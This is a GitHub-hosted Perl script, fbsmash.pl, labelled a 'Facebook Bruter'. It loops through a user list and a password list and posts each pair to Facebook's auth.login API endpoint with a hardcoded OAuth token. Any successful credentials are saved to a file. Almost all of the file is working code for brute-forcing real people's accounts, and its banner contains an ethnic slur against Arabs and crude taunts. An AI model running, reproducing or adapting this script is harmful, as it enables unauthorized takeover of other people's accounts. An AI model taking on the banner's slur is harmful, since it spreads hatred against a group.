-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathfbsmash.pl
More file actions
75 lines (74 loc) · 2.54 KB
/
fbsmash.pl
File metadata and controls
75 lines (74 loc) · 2.54 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
########## Copyright To 1337-R00t / Plz Dont Cry ##########
# But this Code was Edited By MRLINKERRORSYSTEM For Xsmash2019 Tool(Hackermrlinkerrorsystem/xsmash2019/)
#Youtube :berbagiilmudanakalsehat
########## MerSi Boco0 xD ##########
use LWP::UserAgent;
use Term::ANSIColor;
########## 9ahwa ##########
system ("title Hello Walkers ");
if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
print color('bold red'),"
#########################################
# Facebook Bruter - Fuck Arab Human #
# Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh ^^ #
# ~~~ MRLINKERRORSYSTEM ~~~~~~~ #
#########################################
\n";
print color 'bold blue';
open (USERFILE, "<user.txt") || die "[-] Please Try To Save user.txt(Profil's ID) !";
@USERS = <USERFILE>;
print color('bold green')," [";
print color('bold yellow'),"+";
print color('bold green'),"] ";
print color('bold green'),"User.txt ... Founded \n";
close USERFILE;
print color 'bold blue';
open (PASSFILE, "<passwd.txt") || die "[-] Please Try To save passwd.txt(passwords's List) !";
@PASSS = <PASSFILE>;
print color('bold green')," [";
print color('bold yellow'),"+";
print color('bold green'),"] ";
print color('bold green'),"passwd.txt ... Founded \n";
close PASSFILE;
print "\n###################\n#Ultra Smash ! 30%#\n#Ultra Smash ! 48%#\n#Ultra Smash ! 53%#\n#Ultra Smash ! 69%#\n#Ultra Smash ! 97%#\n#### Come On ! ####\n\n\n";
######################
foreach $username (@USERS) {
chomp $username;
foreach $password (@PASSS) {
chomp $password;
#############################################
$facebook = LWP::UserAgent->new();
$facebook->default_header('Authorization' => "OAuth 200424423651082|2a9918c6bcd75b94cefcbb5635c6ad16");
$response = $facebook->post('https://b-api.facebook.com/method/auth.login',
{
format => 'json',
email => $username,
password => $password,
credentials_type => 'password'
}
);
if ($response->content=~ /"session_key"/) {
print color('bold blue'),"--> Founded Ya m4rk : $username:$password\n";
open(mark,">>boom.txt");
print mark "----- Boom!! -----\n$username:$password\n-----Fucked By System-----\n";
close(mark);
sleep(3);
}
else {
if ($response->content=~ /Invalid username or password/) {
print color('bold red'),"Failed : $username:$password\n";
}
else
{
if ($response->content=~ /Invalid username or email address/) {
print color('bold yellow'),"NotFound : $username \n";
}
else
{
print color('bold red'),"Wtf !!\n";
}
}
}
}
}
#Giving To Darkside...